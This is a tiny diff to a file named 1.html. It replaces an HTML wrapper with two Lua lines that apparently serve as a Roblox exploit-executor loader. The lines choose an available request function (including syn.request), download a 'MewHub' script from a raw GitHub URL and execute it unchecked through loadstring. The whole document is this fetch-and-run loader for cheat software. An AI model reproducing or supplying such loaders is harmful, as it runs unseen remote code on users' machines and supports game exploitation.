--- a/1.html
+++ b/1.html
@@ -1,16 +1,3 @@
+local http_request = http_request or request or (syn and syn.request) or (http and http.request)
 
-<!DOCTYPE html>
-
-<html>
-
-<body>
-
-<h6> local http_request = http_request or request or (syn and syn.request) or (http and http.request)
-
-    loadstring(http_request({Url="https://raw.githubusercontent.com/bigbootylatinas/MewHub/main/Last%20MewHub%20update.lua",Method="GET"}).Body)() </h6>
-
-</body>
-
-</html>
-
-
+loadstring(http_request({Url="https://raw.githubusercontent.com/bigbootylatinas/MewHub/main/Last%20MewHub%20update.lua",Method="GET"}).Body)()
